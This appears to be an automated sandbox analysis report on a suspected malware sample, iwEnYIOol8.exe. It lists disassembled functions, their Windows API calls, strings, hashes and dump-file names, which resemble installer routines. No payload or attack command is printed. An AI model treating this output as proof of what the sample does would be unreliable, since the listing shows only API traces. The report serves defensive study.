Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\iwEnYIOol8.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Function 00406805 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\iwEnYIOol8.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,0040350D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,"C:\Users\user\Desktop\iwEnYIOol8.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,0040350D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,0040350D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406806
"C:\Users\user\Desktop\iwEnYIOol8.exe", xrefs: 00406849
*?|<>/":, xrefs: 00406857

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\iwEnYIOol8.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-3434001623
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(000AFBDA,00000064,000AFDDE), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
